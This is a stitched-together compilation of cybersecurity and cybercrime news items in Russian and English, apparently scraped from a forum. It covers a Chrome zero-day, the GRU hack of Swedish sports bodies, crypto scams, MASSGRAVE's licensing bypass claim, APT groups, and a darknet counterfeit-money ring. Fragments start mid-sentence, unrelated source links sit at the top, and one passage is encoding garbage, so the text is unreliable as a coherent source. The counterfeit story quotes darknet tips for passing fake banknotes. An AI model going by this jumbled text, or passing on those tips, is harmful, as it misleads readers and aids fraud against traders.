• Source: [https://www.wsj.com/articles/app- ta...2mgzjj2fo6fom65&reflink=article_copyURL_share](https://www.wsj.com/articles/app- taps-unwitting-users-abroad-to-gather-open-source- intelligence-11624544026?st=2mgzjj2fo6fom65&reflink=article_copyURL_share)
• Source: [https://www.zerohedge.com/geopoliti...onized-worlds-corporate- military-intelligence](https://www.zerohedge.com/geopolitical/how-obscure-app- revolutionized-worlds-corporate-military-intelligence)
• Source: <https://petapixel.com/2021/06/26/photo-app-turns-users-into- unwitting-spies-for-us-military/>
И вот пришло очередное обновление браузера Google Chrome. Разработчики устранили уже седьмую уязвимость нулевого дня (0-day) с начала этого года. Пользователям Chrome для операционных систем Windows, macOS и Linux рекомендуется срочно установить последнюю версию веб-обозревателя, поскольку злоумышленники активно эксплуатируют брешь в кибератаках.
Новая дыра получила идентификатор CVE-2021-30554 и высокую степень опасности. Проблема класса «use after free» затрагивает библиотеку WebGL — API на JavaScript для отрисовки 2D- и 3D-графики в браузере.
Успешная эксплуатация уязвимости может привести к повреждению данных, сбоям в работе приложения и даже к выполнению вредоносного кода или команд. Google узнала о проблеме несколько дней назад от анонимного исследователя.
Разработчики также отметили, что им известно о существовании эксплойта, который используется в атаках киберпреступников. Удивительно, что предыдущую 0-day в Chrome устранили менее десяти дней назад — CVE-2021-30551.
Обязательно проверьте версию интернет-обозревателя. Для этого можно перейти в настройках в пункт «О Google Chrome». У вас должна быть установлена версия под номером 91.0.4472.114 — она актуальная на данный момент.
Источник: https://www.anti-malware.ru/news/2021-06-18-111332/36179
hackers working for Russian military intelligence, officials said.
The Swedish Sports Confederation is the umbrella organisation of the Swedish sports movement, it was hacked by Russian military intelligence in a campaign conducted between December 2017 and May 2018, officials said.
In the same period, Russia-linked hackers working for the military intelligence service GRU targeted other prominent sporting bodies, including [World Anti-Doping Agency (WADA)](https://securityaffairs.co/wordpress/51255/data-breach/wada-data- breach.html) and [FIFA](https://securityaffairs.co/wordpress/77591/data- breach/fifa-second-hack.html).
According to the experts, the hackers hit the WADA agency in response to accusations of government-sponsored doping for Russian athletics, some of them were even banned from the 2016 Olympic Games.
Swedish prosecutors confirmed that the Swedish Sports Confederation was breached by GRU that stole athletes’ personal details, such as medical records, and shared them with local media.
The campaign was uncovered following a joint operation conducted by the Swedish Security Service along with foreign peers. The bad news is that the investigation was dropped because according to public prosecutor Mats Ljungqvist, “the necessary preconditions for taking legal proceedings abroad or extradition to Sweden are lacking.”
“The investigation shows that the Russian military intelligence,GRU who, via its 85th Center , also known as unit 26165 , has planned and carried out the serious breaches of data secrecy against the Swedish Sports Confederation,” said Ljungqvist. “The information has been published openly and, based on these details, Swedish media have written articles which follow GRU’s narrative of discrediting athletes and sports organisations in the West.”
This is the first time that Swedish officials formally blamed Russia for the 2017 hack of the Swedish Sports Confederation (SSC). Ljungqvist explained that the investigation was interrupted because there is no legal backing to support Swedish authorities in charging the foreign state-sponsored hackers and requesting their extradition from Russia so they can be prosecuted in Sweden.
Threat actors have started to use 'Promoted' tweets, otherwise known as Twitter ads, to spread cryptocurrency giveaway scams.
For some time, BleepingComputer has been reporting on scammers hacking into verified Twitter accounts to promote fake cryptocurrency giveaway scams. These scams pretend to be from well-known people or companies, such as Elon Musk, Tesla, Gemini Exchange, and, more recently, Chamath Palihapitiya, and Social Capital.
These scams have been incredibly successful for the threat actors, with one
round of scams
As these scams continue to generate revenue, the threat actors have also begun
to target other cryptocurrencies that have recently become popular, such as
Dogecoin.
To promote their services and content, Twitter users can 'promote' an existing tweet by paying to have it shown to other users in their Twitter feeds.
Promoting a
tweet on Twitter
This week, security researchers zseano,
Jake, and
MalwareHunterTeam have monitored a new
trend used by the cryptocurrency scammers - taking out Twitter advertisements
to promote their scams.
|

---|---
As you can see from the above images, both tweets are being promoted by
Twitter and contain URLs to cryptocurrency giveaways.
When creating the tweets, the scammers break up the URL so that Twitter's ad
fraud detection algorithms do not detect them.
Like the previous giveaway scams, these URLs lead to fake Medium pages pretending to be from Tesla, Social Capital, and Gemini Exchange that contain further links to the actual giveaway sites.
Fake Elon
Musk Medium post
The giveaway sites' final landing pages are commonly Tesla, or Elon Musk-
themed and contain a Bitcoin, Ethereum, or Dogecoin address that users are
told to send coins. In return, the scammers state that the sender will receive
double the amount that they sent.
Fake
Tesla giveaway landing page
From looking at only a few of the scams, the Bitcoin and Ethereum addresses
used have generated a total of $39,628.06 so far.
Some of the cryptocurrency addresses used in these scams are listed below:
Ethereum:
Bitcoin:
Unfortunately, the scammers currently use many more cryptocurrency addresses, so the amount generated is probably far more significant.
The British government has unveiled its new, post-Brexit military strategy on
Monday, highlighting a major reform of the British armed forces which aims to
adapt the British military employ new tools to face new threats. The number of
soldiers will be reduced – making the post-reform military the smallest
British army in 300 years – with hundreds of tanks, armored troops carriers,
and jet fighters mothballed. Money will go toward developing and deploying
innovative capabilities, including satellites, electronic warfare, cyber,
drones, and robots.
The British government has unveiled its new, post-Brexit military strategy on
Monday, highlighting a major reform of the British armed forces which aims to
adapt the British military employ new tools to face new threats.
The emphasis on cybertools will be accompanied by a reduction in the overall number of troops.
“The armed forces must think and act differently,” Defense Minister Ben Wallace told Parliament. “They will no longer be seen as a force of last resort, but will become an active force more present in the world.”
The armed forces will operate in the “gray zone between peace and war.”
The change in orientation will result in budgetary changes, with more money directed toward developing and acquiring innovative capabilities, including satellites, electronic warfare, cyber, drones, and robots. About £6.6 billion will be invested in research and development, and Britain will create its own space command. Conventional and nuclear strike capabilities will be augmented. The Defense Ministry will announce the number of nuclear warheads Britain will develop and deploy.
The Royal Navy will be strengthened, following Prime Minister Boris Johnson’s announcement last year of his plan to make the United Kingdom “the leading naval power in Europe.” The Royal Marines will be transformed and given a new name — the Future Commando Force (FCF) – and will assume the responsibility for “protecting the sea lanes and maintaining the freedom of navigation.”
The army will bear the brunt of the reductions in the number of troops. The army’s size will be reduced by 10,000 men, making it the smallest British army in about three hundred years. The number of army soldiers will be reduced from 82,000 to 72,500, and 700 Warrior armored troops carriers a third of the Challenger II tanks will be withdrawn from service. The Royal Air Force will see 100 aircrafts mothballed, but the RAF will also be given £2 billion to purchase the future Tempest fighter jet, developed by BAE.
The sweeping reform and downsizing of the military have been with criticism. Former army chief of staff Lord Richards of Herstmonceux warned that the plan, if adopted, would make it impossible for Britain to retake the Falkland Islands today, or wage another Gulf War. He said that “numbers always matter” in modern conflicts, emphasizing the importance of conventional capabilities.
“When threats change, we must change with them,” Wallace said, otherwise we end up with “an army similar to that of the First World War.”
Last November, Johnson said that his plan was to invest more in the British military than any previous government in the last thirty years, with additional £16.5 billion over four years. The U.K. defense budget will thus reach 2.2 percent of GDP, keeping the United Kingdom in a position it has held for over a decade, as the European country which spends the most on defense in absolute terms, and sharing, with Estonia, the second position among NATO members when the defense budget is measured as a percentage of GDP (Greece, with 2.4 percent, spends the highest percentage of its GDP on defense among NATO members).
Группа хакеров MASSGRAVE сделала заявление о разработке нового метода обхода системы лицензирования программного обеспечения Microsoft Windows и Office. По их словам, технология позволяет навсегда активировать практически любую версию Windows и Office, включая серверные версии, корпоративные ключи CSVLK (Customer Specific Volume License Keys) и обновления безопасности Extended Security Updates (ESU).
Особенность метода заключается в его простоте. Хакеры утверждают, что новая технология не требует установки сторонних файлов, изменения системных данных или вмешательства в операционную систему, что делает процесс полностью «чистым» и максимально удобным для пользователей. На своих ресурсах они опубликовали скриншоты активированных версий Windows с ESU, подтверждая свои заявления. Например, соответствующее изображение доступно в их посте .
_аявление хакеров (слева) и пример активированной версии Windows (справа) (@massgravel )_
Поддерживаемые версии включают в себя Windows 7, Windows 8/8.1, Windows 10, Windows 11, а также различные серверные версии и их дополнительные функции. Важно отметить, что метод охватывает Extended Security Updates для Windows 10, которые начнут действовать с октября 2025 года, продлевая поддержку устаревших систем.
Ранее методы активации, такие как HWID (Hardware ID) и KMS (Key Management Service), использовались для временной активации. HWID применялся с 2018 года, а KMS — более 17 лет. Однако они не могли обеспечить постоянную активацию всех версий. Новый способ, как утверждают разработчики, устраняет эти ограничения и значительно расширяет возможности.
Хакеры анонсировали, что их инструмент будет выпущен в публичный доступ в
ближайшие месяцы. Если их заявления окажутся правдивыми, Microsoft столкнётся
с серьёзной угрозой для своей системы лицензирования. Пока неизвестно, какие
контрмеры компания предпримет, но эта ситуация может стать вызовом для будущей
политики лицензирования софта.
Подробнее:
https://www.securitylab.ru/news/554475.php
Криптовалютная биржа FixedFloat подверглась хакерской атаке, в результате которой были похищены активы на сумму свыше 26 миллионов долларов.
Наблюдения за транзакциями выявили неавторизированный трансфер средств: перевод 409 биткоинов, оцениваемых в 21,17 миллиона долларов, и 1728 эфиров, стоимостью 4,85 миллиона долларов.
В связи с внезапной утечкой цифровых средств, платформа была временно переведена на техобслуживание и продолжает оставаться вне доступа.
В официальном заявлении, опубликованном аккаунтом биржи в социальной сети Х, было сообщено: "Встретились с незначительными техническими неполадками, в связи с чем было принято решение перевести нашу сервисную платформу в режим обслуживания".
p.s не так давно была только тема
Сотрудники УФСБ России по Тамбовской области раскрыли преступление, совершенное 39-летним жителем Котовска. Он взломал сетевое оборудование финансовой организации, используя программу, которая нейтрализует средства защиты информации. Это произошло в июле 2022 года.
По материалам УФСБ было возбуждено уголовное дело по ч. 1 ст. 273 УК России (создание, использование и распространение вредоносных компьютерных программ). Котовский городской суд признал взломщика виновным и приговорил его к 1 году ограничения свободы.
Приговор вступил в законную силу, сообщает пресс-служба УФСБ России по Тамбовской области.
Киберполиция разоблачила разработчика фейкового приложения цифровых услуг,
который полностью копировал дизайн "Дії". Им оказался 21-летний парень.
Правонарушителю может грозить до шести лет заключения.
Противоправную деятельность 21-летнего мужчины разоблачили сотрудники отдела
противодействия киберпреступлениям в Запорожской области совместно со
следователями Запорожского районного управления полиции и в сотрудничестве с
представителями Минцифры.
"Злоумышленник разработал приложение для смартфонов, которое по дизайну было
идентичным с государственным приложением "Дія". В фейковой программе юзерам
предоставлялась возможность сделать для себя хоть какой документ из
представленных в официальном программном обеспечении. В частности,
пользователи могли изменить свой возраст, добавить любое фото или подделать
сертификат о вакцинации COVID-19.
Свою разработку мужчина продавал в мессенджере за 100 гривен, а в рекламе
указывал, что благодаря ее применению несовершеннолетние могут
беспрепятственно покупать алкоголь и сигареты"
В настоящее время правоохранители проводят мероприятия по блокированию всех
каналов распространения фейкового приложения. _Также устанавливаются лица,
которые приобрели приложение для предоставления правовой квалификации их
действиям.
Spoiler: Фото
_[Источник](https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya- vikrila-rozrobnika-fejkovogo-zastosunku-czifrovix-poslug/)
Twitter caused quite the panic Thursday night when they accidentally sent emails asking users to confirm their accounts, which looked suspiciously like a phishing attack.
These emails began around 10 PM EST, with numerous Twitter accounts operated by BleepingComputer and its writers receiving the emails.
These emails used the subject "Confirm your Twitter account" and included a
button labeled 'Confirm Now.' Even though the links in the emails all looked
legitimate, as we were not expecting these emails, we immediately became
suspicious that it was a phishing attack.
Suspicious Twitter account
confirmation email sent Thursday night
It turns out we were not alone in being suspicious of the emails, as users
took to Twitter to express their concerns.
Phishing scam alert. Delete. Delete. Delete.
— Yogi Bear (@akdelhi) April 23, 2021Click to expand...
Getting emails from “Twitter” to confirm my account. I think it’s phishing. There’s nothing wrong with this account. #WritingCommunity
— Dan Santos, Novelist (@dansantosnovels) April 23, 2021Click to expand...
Interesting. The Twitter email is from the authentic address (I checked their FAQs) but there is missing punc in the business address at the bottom of the email itself which tends to be a giveaway it's phishing rather than authentic. We'll see.
— Laura G (@LaurasMiscMovie) April 23, 2021Click to expand...
It turns out that the confirmation emails were not a phishing attack but simply an accident by Twitter, as confirmed by the Twitter Support account.
Some of you may have recently received an email to “confirm your Twitter account” that you weren’t expecting. These were sent by mistake and we’re sorry it happened.
If you received one of these emails, you don't need to confirm your account and you can disregard the message.
— Twitter Support (@TwitterSupport) April 23, 2021Click to expand...
For those who wake up and find the Twitter confirmation email sitting in their inbox, you can safely ignore the message and simply delete it.
$9,3 млн в криптовалюте исчезли из рук злоумышленников за считанные секунды.
Австралийская федеральная полиция (AFP) в рамках операции «Kraken» арестовала $9,3 млн в криптовалюте, связываемых с предполагаемым главой международной преступной организации. Операция была проведена Службой по конфискации криминальных активов (CACT), возглавляемой AFP.
17 сентября был задержан 32-летний мужчина из пригорода Нарви в Южном Сиднее, которого подозревают в создании и управлении зашифрованной платформой коммуникации под названием Ghost. Ему предъявлены обвинения по пяти статьям, включая содействие преступной организации.
Конфискация криптоактивов стала возможной благодаря аналитическому специалисту
CACT, который сумел расшифровать «seed-фразу» — ключевую информацию для
доступа к криптокошельку, что позволило AFP перевести средства злоумышленников
в безопасное хранилище ведомства. Примечательно, что это уже вторая крупная
конфискация в рамках операции «Kraken». Ранее были изъяты активы, связанные с
преступным синдикатом в Западной Австралии.
По словам временного командующего AFP Скотта Рэйвена, преступные группы,
пытающиеся скрыть доходы от незаконной деятельности, сталкиваются с
высокотехнологичными возможностями и полномочиями AFP и CACT. Рэйвен
подчеркнул, что ведомство способно обнаружить и изъять любые активы —
недвижимость, криптовалюту или наличные, — лишая преступников их средств.
В рамках операции «Kraken» также достигнуты следующие результаты:
Следствие продолжается, и CACT намеревается добиваться конфискации всех изъятых активов в пользу государства. Учреждённая в 2012 году, CACT объединяет ресурсы и специалистов различных австралийских ведомств, включая полицию, налоговую службу, криминальную разведку, пограничную службу и отчётно- аналитический центр транзакций. Все они эффективно сотрудничают между собой ради достижения поставленных целей.
Согласно австралийскому законодательству, конфискованные активы направляются в специальный счёт для финансирования программ по профилактике преступности, реабилитации и поддержки правоохранительных инициатив по всей стране. С июля 2019 года CACT конфисковала уже более $1,1 млрд криминальных активов, нанеся значительный удар по организованной преступности.
afp.gov.au/news-centre/media-release/operation-kraken-afp- restrains-93-million-crypto-linked-alleged-head

нападаÑÑ Ð½Ð° оÑганизаÑии в РоÑÑии ](https://www.forbes.ru/tekhnologii/516694-ataki-zapisem-hakery-profi- prodolzaut-napadat-na-organizacii-v-rossii)
Ðо II кваÑÑале ÑÑого года компании и оÑганизаÑии в РоÑÑии и ÑÑÑÐ°Ð½Ð°Ñ Ð¡ÐРаÑаковали (и не без ÑÑпеÑа) девÑÑÑ Ð²ÑÑокопÑоÑеÑÑионалÑнÑÑ Ð³ÑÑпп ÑакеÑов, ÑвидеÑелÑÑÑвÑÑÑ Ð´Ð°Ð½Ð½Ñе ÑоÑÑийÑкого...
www.forbes.ru
Во II квартале этого года компании и организации в России и странах СНГ атаковали (и не без успеха) девять высокопрофессиональных групп хакеров, свидетельствуют данные российского разработчика технологий для борьбы с киберпреступлениями F.A.C.C.T. Несмотря на то что такие группировки преимущественно нападают на военные и госорганизации, эксперты констатируют «размытие» их целей и секторов. Они объясняют это удачными атаками на крупных подрядчиков и легким проникновением через них в организации в разных сферах
По данным F.A.C.C.T., во II квартале 2024 года девять прогосударственных APT-
групп вели кампании против организаций в России и СНГ, рассказали Forbes в
компании. Несколько из них по ряду косвенных признаков можно отнести к
проукраинским группам, другие — к азиатским и, предположительно, китайским,
уточнили в F.A.C.C.T. «В частности, в зависимости от используемых
инструментов, целевой страны, часовых поясов работы злоумышленников, ошибок
или комментариев в коде на определенном языке, загрузки тестовых семплов на
публичные «песочницы» (установить по стране загрузки)», — перечисляют в
компании признаки, по которым можно построить страновую атрибуцию
злоумышленников.
Прогосударственные — организованные хакерские группы, которые в интересах
определенных государств (их спецслужб, военных или государственных ведомств)
атакуют госучреждения, предприятия или компании других стран с целью
кибершпионажа, саботажа, подготовки к проведению кибердиверсий. APT-
группировки (Advanced Persistent Threat — целевая продолжительная атака
повышенной сложности) — это хакеры, обладающие большим уровнем специальных
знаний и значительными ресурсами, позволяющими им создавать угрозу особо
опасных кибератак.
Пять из девяти APT-групп специалисты F.A.C.C.T. обнаружили сами, данные об
активностях еще четырех группировок были публично обнародованы и получены
исследователями преимущественно во время реагирований и расследований
инцидентов ИБ. Так, к числу первых относятся, например, действия Core
Werewolf, которая провела минимум девять атак против России, Армении и
Белоруссии. Большинство из них основывалось на развертывании легитимной
программы удаленного доступа UltraVNC.
_
Кибершпионы Sticky Werewolf добавили в свой арсенал стилер (зловред, ворующий
данные учетных записей, логины и пароли, записанные в браузере, файлы cookies,
файлы с жесткого диска и т.п.) Rhadamanthys и с его помощью с апреля по июнь
провели более 10 атак на организации в России и Белоруссии._ Также группа
продолжает использовать троян удаленного доступа Darktrack. По данным
F.A.C.C.T., группу интересовали организации в сферах здравоохранения,
производства радиосвязи, телекоммуникаций, биотехнологий, оборонно-
промышленного комплекса (ОПК), авиации, энергетики и промышленности,
разработки ПО.
Также эксперты обнаружили новый Go-загрузчик (Go — язык программирования с открытым исходным кодом, разработанный в Google) группы PhantomCore и присвоили ему имя PhantomDL. Версия загрузчика использовалась в нескольких атаках, одна из которых была направлена на российскую IT-организацию и заблокирована системой F.A.C.C.T. Managed XDR.
Кроме того, специалисты раскрыли группы ReaverBits и XDSpy: первая напала на один из государственных фондов России, вторая проводила атаки с помощью вредоносных программ XDSpy.NSISDownloader и XDSpy.GoBackdoor, направленные на Россию, Белоруссию и Молдову.
Четыре АРТ-группировки, показавшие себя в апреле — июне, о которых специалисты уже сообщали, — это Hellhounds, Obstinate Mogwai, Lazy Koala и SugarGh0st Team. В двух инцидентах злоумышленникам первой из них удалось проникнуть в инфраструктуру жертв через подрядчика: «Помимо уже известных атак на узлы под управлением ОС Linux, впервые в процессе реагирования на инцидент в компании в сфере транспорта и перевозок обнаружены успешные атаки на Windows- инфраструктуру», — говорят в F.A.C.C.T. А, к примеру, новая группа Lazy Koala атаковала государственные, финансовые, медицинские, образовательные отрасли России, Белоруссии, Казахстана, Таджикистана, Киргизии, Армении и Узбекистана. Основной целью ее участников была кража учетных записей от различных сервисов с компьютеров сотрудников.
В прошлом году специалисты того же подразделения F.A.C.C.T. Threat Intelligence [констатировали](https://www.forbes.ru/tekhnologii/506712-razvedenie-ugroz-s- kakimi-kiberatakami-stolknulis-rossijskie-kompanii-v-2023-godu): рост числа политически мотивированных атак для хищения конфиденциальной информации или разрушения IT-инфраструктуры российских компаний составил 116% по сравнению с 2022-м. При этом они выделили 14 прогосударственных хакерских APT-групп, активно работавших на территории России и стран СНГ. Чаще всего они атаковали Россию (28 атак), Азербайджан (шесть атак) и Белоруссию, Киргизию, Казахстан (по четыре атаки). Целями были госучреждения, организации, связанные с критически важной инфраструктурой, военные учреждения и предприятия оборонно- промышленного комплекса.
В текущем году прогосударственные атакующие продолжат проявлять активность, а также дадут о себе знать группы, пропавшие на некоторое время с радаров ИБ- экспертов в 2024 году, такие как Cloud Atlas, прогнозирует руководитель департамента Threat Intelligence F.A.C.C.T. Елена Шамшина. «Вероятно, APT- группы продолжат совершенствовать инструменты для минимизации вероятности обнаружения, — рассуждает она. — Основными целями таких групп продолжат оставаться правительственные и военные организации, однако уже наблюдается размытие целевых секторов. Одна из причин этого заключается в том, что злоумышленники успешно атакуют крупных подрядчиков и через них легко проникают в организации в разных сферах».
Атаки APT-групп обычно технически сложные, направлены на крупные компании или госучреждения, и основное отличие, которое выделяет их среди всех остальных, в том, что «невооруженным взглядом» заметить их практически нереально, указывают аналитики. Целью большинства APT-атак является кибершпионаж — в ходе них злоумышленники месяцами и годами скрытно наблюдают за тем, что происходит на зараженных компьютерах, собирая с них нужную информацию, поясняет эксперт по кибербезопасности «Лаборатории Касперского» Георгий Кучерин.
Ущерб, который могут нанести своими нападениями такие злоумышленники, может исчисляться миллиардами долларов. Например, в «Лаборатории Касперского» напоминают, как в ходе одной из кампаний по распространению зловреда NotPetya (также известного как ExPetr) в качестве одного из векторов атаки использовали зараженный государственный сайт. Когда пользователи посещали его, на их компьютеры загружался шифровальщик. NotPetya в свое время нанес ущерб, [оцениваемый](https://www.wired.com/story/notpetya-cyberattack-ukraine-russia- code-crashed-the-world/) в $10 млрд.
Как правило, такие группы имеют собственное вредоносное ПО (ВПО) либо доработанные или модифицированные уже известные инструменты, говорит специалист группы киберразведки экспертного центра безопасности Positive Technologies Александр Бадаев. «Мы нередко видим, что в одной и той же атаке группа может использовать как свое ВПО, так и вредоносные программы с форумов, — добавляет он. — Бывают случаи, когда после выхода репорта от ИБ-вендоров по какой-либо APT на форумах «банят» продавцов ВПО за использование софта на территории России и стран СНГ».
APT-группы могут дольше оставаться в системе незамеченными и месяцами развивать атаку, в то время как финансово-мотивированной группе выгоднее все сделать быстрее, например зашифровать компанию, получить выкуп и двигаться дальше, рассуждает Бадаев. «Чаще всего группы охотятся за конфиденциальными данными атакованных организаций, — объясняет эксперт группы анализа ВПО центра исследования киберугроз Solar 4RAYS ГК «Солар» Антон Каргин. — Кроме того, в нашей практике мы регулярно видим, что, потеряв интерес к инфраструктуре жертвы, злоумышленники пытаются ее уничтожить с помощью шифрования или удаления критически важных данных».
APT-группы, связанные с текущими событиями, обычно действуют агрессивно и часто уничтожают данные, шифруют данные компании без дальнейшей возможности расшифровки, дополняет Бадаев: «Стараются найти и уничтожить резервные копии, чтобы шифрование сильнее ударило по компании. Другие APT обычно действуют более осторожно и занимаются шпионажем, стараясь лишний раз не показывать свое присутствие».
Каждая APT-атака уникальна, и набор инструментов, используемых в каждой из них, разный, продолжает Кучерин. В основном это вредоносные программы, предназначенные для сбора информации, например кражи документов, снятия скриншотов экрана, записи звука с микрофона и изображений с веб-камеры, перечисляет он: «Однако также бывает, что для сбора информации удается использовать во вредоносных целях и легитимные программы, установленные внутри организации».
Профессиональные атакующие применяют массу уловок: закладки в легитимных утилитах, использование редких уязвимостей или уязвимостей в проприетарном ПО, используемом в атакованной организации, непопулярных протоколов для связи с серверами управления, социальная инженерия, говорит Антон Каргин. «Этот список можно продолжать долго. Суть в том, что APT-группировки часто обладают практически неограниченными ресурсами и стараются постоянно совершенствовать свои тактики, техники и процедуры, чтобы быть на шаг впереди стороны защиты», — заключает он.
Волжский районный суд Самарской области огласил приговор членам преступного сообщества самарца Романа Твердохлеба, занимавшегося массовым сбытом поддельных пятитысячных купюр.
Фигуранты получили от 14 до 20 лет колонии строгого режима. Продажи фальшивок велись через магазин на запрещенной даркнет-платформе «Гидра»; впечатляет и размах торговли: преступникам удалось охватить территории от Калининграда до Владивостока.
Масштабное дело преступного сообщества фальшивомонетчиков, лидером которого правоохранители признали самарца Романа Твердохлеба, начиналось с целой россыпи мелких уголовных дел, возбужденных в самых разных регионах РФ в 2021-2022 годах. Среди территорий, которые всплыли в ходе расследования дела о сбыте фальшивых купюр, — Ленинский, Промышленный, Красноглинский районы Самары, Волжский район Самарской области, Тольятти, Калининград, Евпатория, Казань, Челябинск, Нижнекамский район Республики Татарстан, Нижний Новгород, Иркутск, Тюмень, Владивосток, Нытвенский район Пермского края. Позднее этот список пополнили Санкт-Петербург и Ленинградская область.
Когда стало ясно, что во всех случаях сбыта поддельных пятитысячных купюр «работали» одни и те же преступники, все инорегиональные эпизоды объединили в одно большое уголовное дело, которое находилось в производстве следственной части ГСУ ГУ МВД России по Самарской области.
По данным следственного органа, в преступное сообщество кроме его организатора Твердохлеба входили Владимир Юдин, Игорь Щербаков и Дмитрий Гусаров. Период совершения ими преступлений — 2020-2022 годы. Для сбыта подделок использовался администрируемый Твердохлебом интернет-магазин FAKE/MONEY оптимизированной онлайн-платформы hydraruzxpnew4af.onion. Эта платформа — одно из «зеркал» крупнейшей в России запрещенной даркнет-площадки «Гидра» (подробнее об этом — в тексте «Гидру» запретили в Чапаевске»). Сам Твердохлеб присутствовал на площадке под ником Hammer444, придуманным в честь любимого им автомобиля «Хаммер» с номерами 444.
На странице магазина FAKE/MONEY можно было найти (и оперативные сотрудники это впоследствии сделали) переписку с покупателями, данные о выводе криптовалюты, объявления о наборе сотрудников.
Бизнес ОПС Твердохлеба был построен по кальке с наркошопов, то есть сбыт поддельных купюр осуществлялся через тайники-«закладки». Сами купюры лидер ОПС покупал оптом на той же «Гидре» у неустановленных лиц в магазине с названием «Элит». В отдаленные регионы РФ подделки отправлялись посылками транспортно- логистическими компаниями СДЭК и «Пони Экспресс». Для отправки использовались вымышленные имена: Крыгин Николай, Мельников Дмитрий, Климов В.С., Крагин Н.С., Мельников О., Мельников Дмитрий, Прохоров Дмитрий. Значительную часть контрагентов ОПС тоже установили и осудили (один из примеров такого «сотрудничества» — в тексте «Курсанты «кинули» китайцев»).
Заработки от сбыта фальшивых денег аккумулировались на электронном кошельке в виде криптовалюты, затем при помощи обменных ресурсов выводились на банковские карты участников ОПС.
Своему подельнику Щербакову Твердохлеб рассказывал, что у него было несколько интернет-магазинов по реализации поддельных банковских билетов. Один магазин он передал в управление, другой проработал около полугода и был закрыт.
Участник ОПС Владимир Юдин — давний знакомый Романа Твердохлеба, они жили по соседству в поселке Береза. В 2020 году Твердохлеб позвонил Юдину из Санкт- Петербурга и предложил работу по сбыту поддельных денег. Юдин должен был заниматься упаковкой подделок, размещением их в тайники-«закладки» с дальнейшей отправкой геометок Твердохлебу. Сообщники заказали оптовую партию фальшивок в количестве 100 штук — ее забирали из лесной «закладки» за МКАДом где-то в Московской области. Купюры перевезли в тайник в лесополосе под Питером, откуда их забирали по мере необходимости и размещали мелкими партиями в другие «закладки». За каждую новую «закладку» Юдин получал на карту 500-600 рублей. В разговорах фальшивые купюры называли «фантиками» и «бумажками». Позже Твердохлеб вернулся в Самару и хранил фальшивки у себя дома.
В Самаре «закладчиком» был Дмитрий Гусаров, который забирал подделки из тайника в Загородном парке, в лесополосе за ТРК «Мега», на 9-й просеке. Гусарову платили меньше — 150 рублей за одну сделанную «закладку». Позже на допросах он пытался убедить правоохранителей, что был уверен: в свертках находятся медицинские справки, а не поддельные деньги.
Летом 2021 года к преступному сообществу примкнул Игорь Щербаков, который предложил Твердохлебу продавать на раскрученной площадке еще и наркотики. Организатор преступного сообщества подумал и согласился.
Первый опыт продажи наркотика был успешным. В лесополосе за поселком Рощинский нашли оптовую «закладку», где было 100 граммов мефедрона, расфасовали наркотик и продали мелкими партиями по 2200 рублей за 1 грамм. Спустя некоторое время Твердохлеб заявил, что хочет продать магазин FAKE/MONEY из-за низкой доходности, и предложил Щербакову купить его за 450 тыс. рублей. Сделка состоялась, и магазин начал торговать только наркотиками, впрочем, недолго. Уже в ноябре 2021 года Щербакова «приняли» у тайника с мефедроном в 67-м квартале Самарского лесничества.
Оказалось, что полицейские давно отслеживали работу FAKE/MONEY. Сотрудники УЭБиПК областного ГУ МВД инсталлировали браузер «Тор», создали фейковый аккаунт Stuka163, с которого с марта по май 2021 года были осуществлены несколько проверочных закупок фальшивых купюр. Сотрудникам полиции пришлось искать тайники-«закладки» в поселке Дубовый Гай Волжского района, в Красноглинском районе, в лесопарке за больницей Середавина и на 7-й просеке. После задержания Щербакова расследование пошло быстрее — тот выдал силовикам логины и пароли от магазина на «Гидре». Вскоре были установлены и задержаны все члены преступного сообщества.
Уголовное дело ОПС Романа Твердохлеба слушалось судом Волжского района
Самарской области. Членам преступного сообщества вменили статью 210 УК РФ
(создание и участие в преступном сообществе), часть 3 статьи 186 УК РФ
(изготовление, хранение, перевозка или сбыт поддельных денег или ценных бумаг,
совершенные организованной группой), а лидеру сообщества и Щербакову — еще и
статьи о незаконном сбыте наркотиков. Недавно по делу огласили обвинительный
приговор. Как сообщили «СО» в прокуратуре Самарской области, «суд согласился с
мнением государственного обвинителя и назначил организатору преступного
сообщества наказание в виде 20 лет лишения свободы со штрафом в размере 2 млн
рублей. Трое других осужденных приговорены к лишению свободы на срок от 14 до
16 лет со штрафами от 900 тысяч до 2 млн рублей. Отбывать наказание они будут
в исправительной колонии строгого режима».
Курсанты «кинули» китайцев
Среди потерпевших от действий ОПС Романа Твердохлеба — целая группа китайцев- торговцев из Владивостока: Нгуен Ван Нгок, Цуй Сянцин, Чыонг Тхи Суан, Нгуен Тхи Хыонг, Выонг Тхи Лиеу, Нгуен Тхи Чан. Все они работали на Некрасовском рынке и Второреченском рыбном рынке Владивостока.
Обидчики китайских торговцев — моряки-курсанты Алексей Шведчиков и Артем Костерин, которые заказали в магазине FAKE/MONEY в даркнете 10 поддельных пятитысячных купюр за 18 тыс. рублей. Для этого Костерин зарегистрировался на «Гидре» под ником Shebal23457. Оба фигуранта на тот момент проживали в общежитии Морского государственного университета имени адмирала Невельского, курсантами которого они были.
Как сообщили на допросах обвиняемые, на «Гидре» была размещена целая инструкция по «правильному» сбыту фальшивых купюр. Рекомендовалось расплачиваться подделками на рынках, где плохое освещение, нет аппаратов для проверки подлинности ассигнаций. Ходить и сбывать «нужно» не менее чем двум людям, в разных местах и по одной купюре, а еще — принимать меры к отвлечению продавцов. Был совет хранить в кошельке несколько купюр мелкого достоинства и при приобретении товара показывать продавцу, что не хватает денег на покупку и придется расплатиться крупной пятитысячной купюрой.
Также в деле Шведчикова и Костерина есть скриншот странички магазина FAKE/MONEY. На страничке было размешено объявление: «Данный товар можно приобрести с доставкой по России. Отправляем Стелсом (прячем купюры в игрушку/книгу и тд). Отправляем исключительно 1 классом. После отправления Вы получаете трек для отслеживания. РАБОТАЕМ С ГАРАНТОМ (что такое гарант, не поясняется. — Прим. ред.). Минимальное количество купюр для отправки -15 шт. ДОСТАВКА ПО РФ УЖЕ ВКЛЮЧЕНА В СТОИМОСТЬ. Заходите к нам на форум» (сохранена орфография оригинала).
